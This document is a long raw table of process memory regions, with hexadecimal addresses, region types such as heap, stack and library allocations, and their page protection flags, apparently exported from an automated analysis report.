281AC07E000
|
heap
|
page read and write
|
||
25B4EF80000
|
heap
|
page read and write
|
||
14CC07E0000
|
heap
|
page read and write
|
||
24630171000
|
trusted library allocation
|
page read and write
|
||
281A9C51000
|
heap
|
page read and write
|
||
19525FC3000
|
heap
|
page read and write
|
||
22216334000
|
heap
|
page read and write
|
||
E269CFC000
|
stack
|
page read and write
|
||
281AC9EA000
|
heap
|
page read and write
|
||
281AC8A0000
|
direct allocation
|
page read and write
|
||
281AD2F0000
|
trusted library allocation
|
page read and write
|
||
2DDB4EDB000
|
heap
|
page read and write
|
||
1FCD61C6000
|
heap
|
page read and write
|
||
174F1941000
|
heap
|
page read and write
|
||
7FFD9A7ED000
|
trusted library allocation
|
page execute and read and write
|
||
23BCCB15000
|
heap
|
page read and write
|
||
281ABF24000
|
heap
|
page read and write
|
||
281ABF5C000
|
heap
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
19525FF5000
|
heap
|
page read and write
|
||
7FFD9A7A0000
|
trusted library allocation
|
page read and write
|
||
21B78FD2000
|
heap
|
page read and write
|
||
281AC9A2000
|
heap
|
page read and write
|
||
1BD4E000
|
stack
|
page read and write
|
||
7FFD9A7AD000
|
trusted library allocation
|
page execute and read and write
|
||
1F2249D0000
|
heap
|
page read and write
|
||
174F1996000
|
heap
|
page read and write
|
||
174F19B3000
|
heap
|
page read and write
|
||
281AC9C4000
|
heap
|
page read and write
|
||
7FFD9AA60000
|
trusted library allocation
|
page read and write
|
||
2224EDE0000
|
trusted library allocation
|
page read and write
|
||
1B8AC299000
|
heap
|
page read and write
|
||
1DFEFC83000
|
heap
|
page read and write
|
||
281AB6A5000
|
heap
|
page read and write
|
||
7FFD9A9F0000
|
trusted library allocation
|
page read and write
|
||
12A5E0DE000
|
heap
|
page read and write
|
||
19524F9D000
|
heap
|
page read and write
|
||
2224A000000
|
heap
|
page read and write
|
||
1C09920B000
|
heap
|
page read and write
|
||
281AC9C2000
|
heap
|
page read and write
|
||
1DFEFC1D000
|
heap
|
page read and write
|
||
F9A5EFB000
|
stack
|
page read and write
|
||
281ABA70000
|
heap
|
page read and write
|
||
264FC1ED000
|
heap
|
page read and write
|
||
2538CA41000
|
heap
|
page read and write
|
||
7FFDFAD12000
|
unkown
|
page execute and read and write
|
||
7FFD9A7A0000
|
trusted library allocation
|
page read and write
|
||
7FFE0EC6C000
|
unkown
|
page read and write
|
||
E30000
|
heap
|
page read and write
|
||
16CEEF33000
|
heap
|
page read and write
|
||
23699F79000
|
heap
|
page read and write
|
||
174F0EF6000
|
trusted library allocation
|
page read and write
|
||
16CEEF2F000
|
heap
|
page read and write
|
||
16CEF076000
|
heap
|
page read and write
|
||
7FFD9A8C0000
|
trusted library allocation
|
page execute and read and write
|
||
23BCC92F000
|
heap
|
page read and write
|
||
227EEE07000
|
heap
|
page read and write
|
||
23BCC915000
|
heap
|
page read and write
|
||
29B1000
|
trusted library allocation
|
page read and write
|
||
2DDB4EBB000
|
heap
|
page read and write
|
||
1309000
|
heap
|
page read and write
|
||
7FF644870000
|
unkown
|
page readonly
|
||
195247C6000
|
heap
|
page read and write
|
||
23699D40000
|
heap
|
page read and write
|
||
1412F920000
|
heap
|
page read and write
|
||
1C09AB8E000
|
heap
|
page read and write
|
||
1B8AC28B000
|
heap
|
page read and write
|
||
2646A2A9000
|
heap
|
page read and write
|
||
281ABF3C000
|
heap
|
page read and write
|
||
281ABF76000
|
heap
|
page read and write
|
||
20355250000
|
heap
|
page read and write
|
||
2462ECB8000
|
trusted library allocation
|
page read and write
|
||
16CEEF7D000
|
heap
|
page read and write
|
||
13B0000
|
heap
|
page read and write
|
||
281AC0BE000
|
heap
|
page read and write
|
||
7FFE1A459000
|
unkown
|
page execute and read and write
|
||
7FFDFF258000
|
unkown
|
page read and write
|
||
2224A100000
|
heap
|
page read and write
|
||
227EEE10000
|
heap
|
page read and write
|
||
281ABA23000
|
heap
|
page read and write
|
||
1952473F000
|
heap
|
page read and write
|
||
281ACB60000
|
heap
|
page read and write
|
||
F9A60FF000
|
stack
|
page read and write
|
||
16CEEF76000
|
heap
|
page read and write
|
||
174F193C000
|
heap
|
page read and write
|
||
2F01DFE000
|
stack
|
page read and write
|
||
281AB9BE000
|
heap
|
page read and write
|
||
174F19B3000
|
heap
|
page read and write
|
||
7FFD9A7BD000
|
trusted library allocation
|
page execute and read and write
|
||
281AD340000
|
heap
|
page read and write
|
||
174F19A5000
|
heap
|
page read and write
|
||
281AB6BF000
|
heap
|
page read and write
|
||
1C09AB81000
|
heap
|
page read and write
|
||
7FFD9A86C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A960000
|
trusted library allocation
|
page execute and read and write
|
||
281ABF48000
|
heap
|
page read and write
|
||
7FFD9A7BB000
|
trusted library allocation
|
page read and write
|
||
281AC04F000
|
heap
|
page read and write
|
||
281AC8F0000
|
direct allocation
|
page read and write
|
||
281AB6BF000
|
heap
|
page read and write
|
||
2A75F790000
|
heap
|
page read and write
|
||
1F226052000
|
trusted library allocation
|
page read and write
|
||
264FC1C5000
|
heap
|
page read and write
|
||
174F1B38000
|
heap
|
page read and write
|
||
281AB6A0000
|
heap
|
page read and write
|
||
7FFD9A950000
|
trusted library allocation
|
page read and write
|
||
281AC03E000
|
heap
|
page read and write
|
||
281AC08A000
|
heap
|
page read and write
|
||
23F47500000
|
heap
|
page read and write
|
||
1FCD632B000
|
heap
|
page read and write
|
||
1C098C54000
|
heap
|
page read and write
|
||
281AC07D000
|
heap
|
page read and write
|
||
281ACAB8000
|
heap
|
page read and write
|
||
7FFE11ED8000
|
unkown
|
page execute and read and write
|
||
21B78FC7000
|
heap
|
page read and write
|
||
281AC033000
|
heap
|
page read and write
|
||
1DFEFC24000
|
heap
|
page read and write
|
||
22249902000
|
heap
|
page read and write
|
||
281AC07E000
|
heap
|
page read and write
|
||
281AC9CE000
|
heap
|
page read and write
|
||
1C098C61000
|
heap
|
page read and write
|
||
24646FEC000
|
heap
|
page read and write
|
||
281ABF48000
|
heap
|
page read and write
|
||
16CEEF23000
|
heap
|
page read and write
|
||
7FFD9A7DD000
|
trusted library allocation
|
page execute and read and write
|
||
281AC9B7000
|
heap
|
page read and write
|
||
7FF71F11A000
|
unkown
|
page read and write
|
||
281AC9E4000
|
heap
|
page read and write
|
||
1C099227000
|
heap
|
page read and write
|
||
1EC765F5000
|
heap
|
page read and write
|
||
1450000
|
trusted library allocation
|
page read and write
|
||
7FFD9AA20000
|
trusted library allocation
|
page read and write
|
||
2684AF27000
|
heap
|
page read and write
|
||
1FCD6325000
|
heap
|
page read and write
|
||
21B78F95000
|
heap
|
page read and write
|
||
7FFD9A7DD000
|
trusted library allocation
|
page execute and read and write
|
||
281AD1A4000
|
heap
|
page read and write
|
||
1FCD67DC000
|
heap
|
page read and write
|
||
2224988D000
|
heap
|
page read and write
|
||
2D30000
|
heap
|
page read and write
|
||
2470000
|
heap
|
page execute and read and write
|
||
21B78F5A000
|
heap
|
page read and write
|
||
174F1A35000
|
trusted library allocation
|
page read and write
|
||
281AB9CC000
|
heap
|
page read and write
|
||
7FFDFADE1000
|
unkown
|
page execute and read and write
|
||
2224F11A000
|
trusted library allocation
|
page read and write
|
||
174F19CF000
|
heap
|
page read and write
|
||
281AC8A0000
|
direct allocation
|
page read and write
|
||
1DFEFC6A000
|
heap
|
page read and write
|
||
1C098B30000
|
trusted library allocation
|
page read and write
|
||
DF0000
|
heap
|
page read and write
|
||
2224ED40000
|
trusted library allocation
|
page read and write
|
||
1FCD6191000
|
heap
|
page read and write
|
||
174F1996000
|
heap
|
page read and write
|
||
7FFE1A451000
|
unkown
|
page execute and read and write
|
||
281ABF2B000
|
heap
|
page read and write
|
||
23671110000
|
heap
|
page read and write
|
||
281AC9CA000
|
heap
|
page read and write
|
||
281AB649000
|
heap
|
page read and write
|
||
174F197B000
|
heap
|
page read and write
|
||
281ABEBF000
|
heap
|
page read and write
|
||
281AC102000
|
heap
|
page read and write
|
||
20355254000
|
heap
|
page read and write
|
||
281AC0AE000
|
heap
|
page read and write
|
||
7FFDFAED1000
|
unkown
|
page execute and read and write
|
||
23BCD014000
|
heap
|
page read and write
|
||
174F1A30000
|
trusted library allocation
|
page read and write
|
||
281ABF1D000
|
heap
|
page read and write
|
||
16CEEF6E000
|
heap
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
1C099239000
|
heap
|
page read and write
|
||
174F1B3C000
|
heap
|
page read and write
|
||
174F1A2E000
|
trusted library allocation
|
page read and write
|
||
1C1CA000
|
stack
|
page read and write
|
||
1266000
|
heap
|
page read and write
|
||
236710E8000
|
heap
|
page read and write
|
||
281AC9C4000
|
heap
|
page read and write
|
||
281ACEC1000
|
heap
|
page read and write
|
||
1FCD6190000
|
heap
|
page read and write
|
||
7FFDFB034000
|
unkown
|
page execute and read and write
|
||
7FFD9A7B2000
|
trusted library allocation
|
page read and write
|
||
281ABF20000
|
heap
|
page read and write
|
||
16CF0B0D000
|
heap
|
page read and write
|
||
23E907C1000
|
heap
|
page read and write
|
||
16CEEED0000
|
heap
|
page read and write
|
||
1F23D096000
|
heap
|
page execute and read and write
|
||
26469A50000
|
heap
|
page read and write
|
||
23BCCB74000
|
heap
|
page read and write
|
||
1B3F6990000
|
heap
|
page read and write
|
||
281AB605000
|
heap
|
page read and write
|
||
281AC033000
|
heap
|
page read and write
|
||
174F1943000
|
heap
|
page read and write
|
||
1C099228000
|
heap
|
page read and write
|
||
222498A1000
|
heap
|
page read and write
|
||
2A1305E4000
|
heap
|
page read and write
|
||
7FFD9AAA0000
|
trusted library allocation
|
page read and write
|
||
264FC1D8000
|
heap
|
page read and write
|
||
281AC10E000
|
heap
|
page read and write
|
||
1FCD8164000
|
heap
|
page read and write
|
||
281AB6D3000
|
heap
|
page read and write
|
||
17D13C51000
|
heap
|
page read and write
|
||
195247C6000
|
heap
|
page read and write
|
||
2462D394000
|
heap
|
page read and write
|
||
2224987A000
|
heap
|
page read and write
|
||
21B79514000
|
heap
|
page read and write
|
||
281AC0BC000
|
heap
|
page read and write
|
||
1FCD614D000
|
heap
|
page read and write
|
||
21B78EC0000
|
trusted library allocation
|
page read and write
|
||
A9783AE000
|
stack
|
page read and write
|
||
2224AC41000
|
trusted library allocation
|
page read and write
|
||
7FFE148BA000
|
unkown
|
page execute and write copy
|
||
281AC9AB000
|
heap
|
page read and write
|
||
7FFD9A7CD000
|
trusted library allocation
|
page execute and read and write
|
||
1DFF1640000
|
heap
|
page read and write
|
||
1DC5D414000
|
heap
|
page read and write
|
||
23BCC921000
|
heap
|
page read and write
|
||
BA0404E000
|
stack
|
page read and write
|
||
16CEEEEA000
|
heap
|
page read and write
|
||
16CEF1A0000
|
heap
|
page read and write
|
||
1B3F6C20000
|
heap
|
page read and write
|
||
281ABE63000
|
heap
|
page read and write
|
||
281ABAAB000
|
heap
|
page read and write
|
||
23BCC921000
|
heap
|
page read and write
|
||
281AC9EE000
|
heap
|
page read and write
|
||
281AC9DC000
|
heap
|
page read and write
|
||
129A1000
|
trusted library allocation
|
page read and write
|
||
1CA95220000
|
heap
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
13CC000
|
heap
|
page read and write
|
||
1E880100000
|
heap
|
page read and write
|
||
281AC11A000
|
heap
|
page read and write
|
||
2462D0FF000
|
heap
|
page read and write
|
||
19525F04000
|
heap
|
page read and write
|
||
281AB920000
|
heap
|
page read and write
|
||
281ACDED000
|
heap
|
page read and write
|
||
281ACBF3000
|
heap
|
page read and write
|
||
1DFEFC9C000
|
heap
|
page read and write
|
||
1BEBF000
|
stack
|
page read and write
|
||
174F198E000
|
heap
|
page read and write
|
||
23699F3D000
|
heap
|
page read and write
|
||
1412F820000
|
heap
|
page read and write
|
||
1CC34E57000
|
heap
|
page read and write
|
||
2224F0A0000
|
remote allocation
|
page read and write
|
||
281AC0BE000
|
heap
|
page read and write
|
||
7FFD9A8D0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9AA40000
|
trusted library allocation
|
page read and write
|
||
281AC9CA000
|
heap
|
page read and write
|
||
7FFD9A7A4000
|
trusted library allocation
|
page read and write
|
||
7FFD9A7E0000
|
trusted library allocation
|
page read and write
|
||
2262D9E4000
|
heap
|
page read and write
|
||
281AB6C2000
|
heap
|
page read and write
|
||
7FFD9A970000
|
trusted library allocation
|
page execute and read and write
|
||
281AC05D000
|
heap
|
page read and write
|
||
7FFD9AA00000
|
trusted library allocation
|
page read and write
|
||
21B7ADE4000
|
heap
|
page read and write
|
||
12FE8000
|
trusted library allocation
|
page read and write
|
||
281ADB30000
|
direct allocation
|
page read and write
|
||
1DFF3230000
|
direct allocation
|
page read and write
|
||
7FFE148D8000
|
unkown
|
page read and write
|
||
19525F85000
|
heap
|
page read and write
|
||
FE7519F000
|
stack
|
page read and write
|
||
129A3000
|
trusted library allocation
|
page read and write
|
||
7FFD9A8B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9AAB0000
|
trusted library allocation
|
page read and write
|
||
1C09921F000
|
heap
|
page read and write
|
||
1C09922E000
|
heap
|
page read and write
|
||
16CEEF27000
|
heap
|
page read and write
|
||
29E0000
|
heap
|
page execute and read and write
|
||
174F1B20000
|
heap
|
page read and write
|
||
281AC09B000
|
heap
|
page read and write
|
||
21B794F7000
|
heap
|
page read and write
|
||
19525F8C000
|
heap
|
page read and write
|
||
19522D6D000
|
heap
|
page read and write
|
||
1E8FFE47000
|
heap
|
page read and write
|
||
13063000
|
trusted library allocation
|
page read and write
|
||
281ACB69000
|
heap
|
page read and write
|
||
CA85F5C000
|
stack
|
page read and write
|
||
1F23D3E9000
|
heap
|
page read and write
|
||
1F234E91000
|
trusted library allocation
|
page read and write
|
||
19522CBA000
|
heap
|
page read and write
|
||
281ABF09000
|
heap
|
page read and write
|
||
1FCD6168000
|
heap
|
page read and write
|
||
281AB96D000
|
heap
|
page read and write
|
||
2DFBFE000
|
stack
|
page read and write
|
||
2646A29F000
|
heap
|
page read and write
|
||
174F199E000
|
heap
|
page read and write
|
||
281AC08A000
|
heap
|
page read and write
|
||
26469B15000
|
heap
|
page read and write
|
||
7FFE1320E000
|
unkown
|
page execute and read and write
|
||
281AB656000
|
heap
|
page read and write
|
||
16CEEF7D000
|
heap
|
page read and write
|
||
781000
|
heap
|
page read and write
|
||
7FFD9A932000
|
trusted library allocation
|
page read and write
|
||
C5C96DB000
|
stack
|
page read and write
|
||
16CEF076000
|
heap
|
page read and write
|
||
281ACBD1000
|
heap
|
page read and write
|
||
215476C0000
|
heap
|
page read and write
|
||
1FCD67E9000
|
heap
|
page read and write
|
||
1F2267A1000
|
trusted library allocation
|
page read and write
|
||
281AB659000
|
heap
|
page read and write
|
||
22249896000
|
heap
|
page read and write
|
||
21B78FB4000
|
heap
|
page read and write
|
||
2224A102000
|
heap
|
page read and write
|
||
16CEEF6E000
|
heap
|
page read and write
|
||
2224F040000
|
trusted library allocation
|
page read and write
|
||
23671132000
|
heap
|
page read and write
|
||
23671109000
|
heap
|
page read and write
|
||
1B960000
|
heap
|
page read and write
|
||
1B56D000
|
stack
|
page read and write
|
||
1B3F6A71000
|
heap
|
page read and write
|
||
1DFEFC22000
|
heap
|
page read and write
|
||
1FCD816E000
|
heap
|
page read and write
|
||
281ABA5E000
|
heap
|
page read and write
|
||
A977DDF000
|
stack
|
page read and write
|
||
7FFD9AB30000
|
trusted library allocation
|
page read and write
|
||
2155A7C8000
|
heap
|
page read and write
|
||
C107CFE000
|
stack
|
page read and write
|
||
8346D0C000
|
stack
|
page read and write
|
||
281ABEDC000
|
heap
|
page read and write
|
||
2DDB4E74000
|
heap
|
page read and write
|
||
16CEEF2D000
|
heap
|
page read and write
|
||
281ACA1D000
|
heap
|
page read and write
|
||
2224EC80000
|
trusted library allocation
|
page read and write
|
||
1FCD67D2000
|
heap
|
page read and write
|
||
1CA95290000
|
heap
|
page read and write
|
||
16CEF079000
|
heap
|
page read and write
|
||
7FFD9A886000
|
trusted library allocation
|
page execute and read and write
|
||
1B97E000
|
stack
|
page read and write
|
||
1C829C3B000
|
heap
|
page read and write
|
||
C8A607F000
|
stack
|
page read and write
|
||
1190000
|
heap
|
page read and write
|
||
23F47944000
|
heap
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
281AC920000
|
direct allocation
|
page read and write
|
||
7FF6448B1000
|
unkown
|
page read and write
|
||
23BCE99E000
|
heap
|
page read and write
|
||
1D372110000
|
heap
|
page read and write
|
||
1625000
|
heap
|
page read and write
|
||
7FFD9A81C000
|
trusted library allocation
|
page execute and read and write
|
||
2BE1000
|
trusted library allocation
|
page read and write
|
||
23F8AB30000
|
heap
|
page read and write
|
||
2367113E000
|
heap
|
page read and write
|
||
2462EA00000
|
heap
|
page readonly
|
||
215478E0000
|
heap
|
page read and write
|
||
12F1000
|
stack
|
page read and write
|
||
7FFD9A972000
|
trusted library allocation
|
page read and write
|
||
2646A137000
|
heap
|
page read and write
|
||
2538CB50000
|
heap
|
page read and write
|
||
1B8AC2A1000
|
heap
|
page read and write
|
||
1E835970000
|
heap
|
page read and write
|
||
1B8AC450000
|
heap
|
page read and write
|
||
CB0000
|
heap
|
page read and write
|
||
281AB6D3000
|
heap
|
page read and write
|
||
7FFDFB6C3000
|
unkown
|
page execute and read and write
|
||
1B870000
|
heap
|
page read and write
|
||
E8C8A78000
|
stack
|
page read and write
|
||
A7F1FE000
|
stack
|
page read and write
|
||
2538CA00000
|
heap
|
page read and write
|
||
23BCD01F000
|
heap
|
page read and write
|
||
1F23D0E7000
|
heap
|
page read and write
|
||
16CF0B04000
|
heap
|
page read and write
|
||
174F1B34000
|
heap
|
page read and write
|
||
211E3160000
|
heap
|
page read and write
|
||
23699E40000
|
heap
|
page read and write
|
||
19522D09000
|
heap
|
page read and write
|
||
23BCC928000
|
heap
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
D307FE000
|
stack
|
page read and write
|
||
23F47940000
|
heap
|
page read and write
|
||
7FFDFAE51000
|
unkown
|
page execute and read and write
|
||
281ACEC2000
|
heap
|
page read and write
|
||
281ACB69000
|
heap
|
page read and write
|
||
1FCD618E000
|
heap
|
page read and write
|
||
306C000
|
trusted library allocation
|
page read and write
|
||
1F224D80000
|
trusted library allocation
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
23E907C1000
|
heap
|
page read and write
|
||
281AC9C4000
|
heap
|
page read and write
|
||
21B794F8000
|
heap
|
page read and write
|
||
281ACB27000
|
heap
|
page read and write
|
||
1DFEFC20000
|
heap
|
page read and write
|
||
1DFF3010000
|
direct allocation
|
page read and write
|
||
1DFEFC93000
|
heap
|
page read and write
|
||
EF4CDFF000
|
unkown
|
page read and write
|
||
2074DB10000
|
heap
|
page read and write
|
||
7FFD9AB00000
|
trusted library allocation
|
page read and write
|
||
19525FE5000
|
heap
|
page read and write
|
||
14CC05A0000
|
heap
|
page read and write
|
||
19525F95000
|
heap
|
page read and write
|
||
160026E1000
|
heap
|
page read and write
|
||
E8C8CFE000
|
stack
|
page read and write
|
||
301E000
|
stack
|
page read and write
|
||
2C40000
|
heap
|
page execute and read and write
|
||
26469AA7000
|
heap
|
page read and write
|
||
DC0000
|
heap
|
page read and write
|
||
1DFEFC2E000
|
heap
|
page read and write
|
||
2A75F5E1000
|
heap
|
page read and write
|
||
16CEEEAF000
|
heap
|
page read and write
|
||
24630896000
|
trusted library allocation
|
page read and write
|
||
1FCD6322000
|
heap
|
page read and write
|
||
7FF4BAEA0000
|
trusted library allocation
|
page execute and read and write
|
||
281AB6C8000
|
heap
|
page read and write
|
||
2A75F5E1000
|
heap
|
page read and write
|
||
143F000
|
stack
|
page read and write
|
||
17D13C51000
|
heap
|
page read and write
|
||
21B7ADE2000
|
heap
|
page read and write
|
||
281ABF60000
|
heap
|
page read and write
|
||
281AC970000
|
direct allocation
|
page read and write
|
||
215478F0000
|
heap
|
page read and write
|
||
281AC9C0000
|
heap
|
page read and write
|
||
1DFEFD67000
|
direct allocation
|
page read and write
|
||
281AC9C0000
|
heap
|
page read and write
|
||
7FFE148C0000
|
unkown
|
page readonly
|
||
281ABE58000
|
heap
|
page read and write
|
||
1F2231E0000
|
heap
|
page read and write
|
||
174F194A000
|
heap
|
page read and write
|
||
1F226B46000
|
trusted library allocation
|
page read and write
|
||
2DFCFE000
|
stack
|
page read and write
|
||
7FFD9A8B6000
|
trusted library allocation
|
page execute and read and write
|
||
1332000
|
heap
|
page read and write
|
||
281ABA25000
|
heap
|
page read and write
|
||
7FF6448AE000
|
unkown
|
page write copy
|
||
281AB6A0000
|
heap
|
page read and write
|
||
16CF0B04000
|
heap
|
page read and write
|
||
2224987D000
|
heap
|
page read and write
|
||
23BCC91F000
|
heap
|
page read and write
|
||
7FFD9ABD0000
|
trusted library allocation
|
page execute and read and write
|
||
1F22314A000
|
heap
|
page read and write
|
||
1CC34F40000
|
heap
|
page read and write
|
||
7FFE0EC29000
|
unkown
|
page execute and read and write
|
||
19525F9F000
|
heap
|
page read and write
|
||
1DFEFCA9000
|
heap
|
page read and write
|
||
A9781BF000
|
stack
|
page read and write
|
||
281AB6D6000
|
heap
|
page read and write
|
||
7FFE148D9000
|
unkown
|
page readonly
|
||
2A75F550000
|
heap
|
page read and write
|
||
7FFDF8550000
|
unkown
|
page readonly
|
||
1FCD6324000
|
heap
|
page read and write
|
||
23BCCA90000
|
heap
|
page read and write
|
||
281AD1C0000
|
direct allocation
|
page read and write
|
||
7FFD9A7D4000
|
trusted library allocation
|
page read and write
|
||
1DFEFC69000
|
heap
|
page read and write
|
||
281AC8F0000
|
direct allocation
|
page read and write
|
||
281ABE6E000
|
heap
|
page read and write
|
||
281ABF1D000
|
heap
|
page read and write
|
||
281AC9DA000
|
heap
|
page read and write
|
||
1C09920A000
|
heap
|
page read and write
|
||
21B7ADF6000
|
heap
|
page read and write
|
||
1F223115000
|
heap
|
page read and write
|
||
26469B2A000
|
heap
|
page read and write
|
||
23BCC8D7000
|
heap
|
page read and write
|
||
12A5E080000
|
heap
|
page read and write
|
||
7FFD9AA80000
|
trusted library allocation
|
page read and write
|
||
6F1000
|
stack
|
page read and write
|
||
2224F0E5000
|
trusted library allocation
|
page read and write
|
||
281ABD21000
|
heap
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
174F1B3C000
|
heap
|
page read and write
|
||
281AC4C4000
|
direct allocation
|
page read and write
|
||
222498B1000
|
heap
|
page read and write
|
||
281AC9CC000
|
heap
|
page read and write
|
||
1E835D84000
|
heap
|
page read and write
|
||
23E907C1000
|
heap
|
page read and write
|
||
281AC9A1000
|
heap
|
page read and write
|
||
B3A9F7F000
|
stack
|
page read and write
|
||
12A5E0CE000
|
heap
|
page read and write
|
||
23BCC91E000
|
heap
|
page read and write
|
||
2224ED44000
|
trusted library allocation
|
page read and write
|
||
1007000
|
heap
|
page read and write
|
||
25F37A00000
|
heap
|
page read and write
|
||
1C098B60000
|
heap
|
page read and write
|
||
1F224E00000
|
heap
|
page execute and read and write
|
||
2262D9FB000
|
heap
|
page read and write
|
||
1C09AB8E000
|
heap
|
page read and write
|
||
2369BD30000
|
heap
|
page read and write
|
||
174F1A2A000
|
trusted library allocation
|
page read and write
|
||
2A75F5D8000
|
heap
|
page read and write
|
||
31B1000
|
trusted library allocation
|
page read and write
|
||
19522E70000
|
heap
|
page read and write
|
||
7FFD9A7A3000
|
trusted library allocation
|
page execute and read and write
|
||
2074DAFB000
|
heap
|
page read and write
|
||
1650000
|
trusted library allocation
|
page read and write
|
||
2F002F9000
|
stack
|
page read and write
|
||
2DFAFE000
|
stack
|
page read and write
|
||
7FFD9A866000
|
trusted library allocation
|
page read and write
|
||
1FCD61AA000
|
heap
|
page read and write
|
||
2463ED80000
|
trusted library allocation
|
page read and write
|
||
1E835940000
|
heap
|
page read and write
|
||
84DB3FF000
|
unkown
|
page read and write
|
||
CE771FF000
|
stack
|
page read and write
|
||
1FCD61CD000
|
heap
|
page read and write
|
||
1EC765F0000
|
heap
|
page read and write
|
||
7FFDFAA3E000
|
unkown
|
page execute and read and write
|
||
222498AD000
|
heap
|
page read and write
|
||
281ABA0F000
|
heap
|
page read and write
|
||
1C09923A000
|
heap
|
page read and write
|
||
C5C975E000
|
stack
|
page read and write
|
||
2A130200000
|
heap
|
page read and write
|
||
281AB6A9000
|
heap
|
page read and write
|
||
1F23D8D0000
|
heap
|
page read and write
|
||
1DFEFC9C000
|
heap
|
page read and write
|
||
1C099225000
|
heap
|
page read and write
|
||
281ACD8A000
|
heap
|
page read and write
|
||
21B794F5000
|
heap
|
page read and write
|
||
7FFD9A880000
|
trusted library allocation
|
page read and write
|
||
1FCD67C8000
|
heap
|
page read and write
|
||
7FFD9AA30000
|
trusted library allocation
|
page read and write
|
||
174F1996000
|
heap
|
page read and write
|
||
281AB926000
|
heap
|
page read and write
|
||
16CEEF5F000
|
heap
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
1360000
|
heap
|
page read and write
|
||
15E847DA000
|
heap
|
page read and write
|
||
23BCC904000
|
heap
|
page read and write
|
||
7664D6B000
|
stack
|
page read and write
|
||
2462D120000
|
heap
|
page read and write
|
||
1BD9F000
|
stack
|
page read and write
|
||
25C1000
|
trusted library allocation
|
page read and write
|
||
2DFA7B000
|
stack
|
page read and write
|
||
1B0E0000
|
heap
|
page read and write
|
||
174F1A28000
|
trusted library allocation
|
page read and write
|
||
7FFE1A45E000
|
unkown
|
page read and write
|
||
281AC04F000
|
heap
|
page read and write
|
||
1C829BF4000
|
heap
|
page read and write
|
||
2462D14B000
|
heap
|
page read and write
|
||
DE0000
|
heap
|
page read and write
|
||
7FFD9A7B4000
|
trusted library allocation
|
page read and write
|
||
21B78ED0000
|
heap
|
page read and write
|
||
1C098B30000
|
trusted library allocation
|
page read and write
|
||
174F199D000
|
heap
|
page read and write
|
||
16CEEED0000
|
heap
|
page read and write
|
||
281AB617000
|
heap
|
page read and write
|
||
7FF64489B000
|
unkown
|
page readonly
|
||
21B78F9F000
|
heap
|
page read and write
|
||
281ABE9E000
|
heap
|
page read and write
|
||
281AC920000
|
direct allocation
|
page read and write
|
||
1BC90000
|
heap
|
page execute and read and write
|
||
227EEDF8000
|
heap
|
page read and write
|
||
26469AB8000
|
heap
|
page read and write
|
||
2074DB10000
|
heap
|
page read and write
|
||
1C829B60000
|
heap
|
page read and write
|
||
E82B5AC000
|
stack
|
page read and write
|
||
281ABE7F000
|
heap
|
page read and write
|
||
1FCD67D5000
|
heap
|
page read and write
|
||
1412F610000
|
heap
|
page read and write
|
||
19522C95000
|
heap
|
page read and write
|
||
2224EDD0000
|
trusted library allocation
|
page read and write
|
||
1DFF323D000
|
direct allocation
|
page read and write
|
||
281AC3E4000
|
direct allocation
|
page read and write
|
||
AB6B87F000
|
stack
|
page read and write
|
||
174F19B3000
|
heap
|
page read and write
|
||
281AC4A8000
|
direct allocation
|
page read and write
|
||
47B9DFF000
|
unkown
|
page read and write
|
||
1FCD6080000
|
trusted library allocation
|
page read and write
|
||
281ABF1D000
|
heap
|
page read and write
|
||
281ABE4F000
|
heap
|
page read and write
|
||
281AB637000
|
heap
|
page read and write
|
||
281ABF1D000
|
heap
|
page read and write
|
||
281AB66A000
|
heap
|
page read and write
|
||
281ACA04000
|
heap
|
page read and write
|
||
16CEEF16000
|
heap
|
page read and write
|
||
7FFE1463E000
|
unkown
|
page execute and read and write
|
||
281AC093000
|
heap
|
page read and write
|
||
1BFD0754000
|
heap
|
page read and write
|
||
1BF40000
|
heap
|
page read and write
|
||
281AB6D3000
|
heap
|
page read and write
|
||
281ABF60000
|
heap
|
page read and write
|
||
23BCE994000
|
heap
|
page read and write
|
||
281AC9EA000
|
heap
|
page read and write
|
||
2646A134000
|
heap
|
page read and write
|
||
2A00000
|
heap
|
page execute and read and write
|
||
7FFE14647000
|
unkown
|
page execute and write copy
|
||
174F0EF3000
|
trusted library allocation
|
page read and write
|
||
281AC995000
|
heap
|
page read and write
|
||
1DFEFC80000
|
heap
|
page read and write
|
||
281AC9EA000
|
heap
|
page read and write
|
||
13061000
|
trusted library allocation
|
page read and write
|
||
1FCD6191000
|
heap
|
page read and write
|
||
281AC08E000
|
heap
|
page read and write
|
||
12A5E030000
|
heap
|
page read and write
|
||
2462D104000
|
heap
|
page read and write
|
||
21B794F3000
|
heap
|
page read and write
|
||
2DDB4EDF000
|
heap
|
page read and write
|
||
1F23D310000
|
trusted library section
|
page read and write
|
||
281AC101000
|
heap
|
page read and write
|
||
1F8B2728000
|
heap
|
page read and write
|
||
17D13C4C000
|
heap
|
page read and write
|
||
174F0EF7000
|
trusted library allocation
|
page read and write
|
||
1DFF31B1000
|
direct allocation
|
page read and write
|
||
19522CBD000
|
heap
|
page read and write
|
||
19525FFD000
|
heap
|
page read and write
|
||
1C099210000
|
heap
|
page read and write
|
||
227EECB0000
|
heap
|
page read and write
|
||
281ABA40000
|
heap
|
page read and write
|
||
1203000
|
heap
|
page read and write
|
||
1F23D1C4000
|
heap
|
page read and write
|
||
1DC5D151000
|
heap
|
page read and write
|
||
174F19B3000
|
heap
|
page read and write
|
||
281ABA75000
|
heap
|
page read and write
|
||
4223DFF000
|
stack
|
page read and write
|
||
20354F2D000
|
heap
|
page read and write
|
||
281ACA17000
|
heap
|
page read and write
|
||
23BCD00E000
|
heap
|
page read and write
|
||
74F000
|
heap
|
page read and write
|
||
227EEE07000
|
heap
|
page read and write
|
||
281ABB20000
|
direct allocation
|
page read and write
|
||
16CEEEEA000
|
heap
|
page read and write
|
||
2646A2A9000
|
heap
|
page read and write
|
||
7FFE0EC69000
|
unkown
|
page execute and read and write
|
||
281AD1C0000
|
direct allocation
|
page read and write
|
||
1F225365000
|
trusted library allocation
|
page read and write
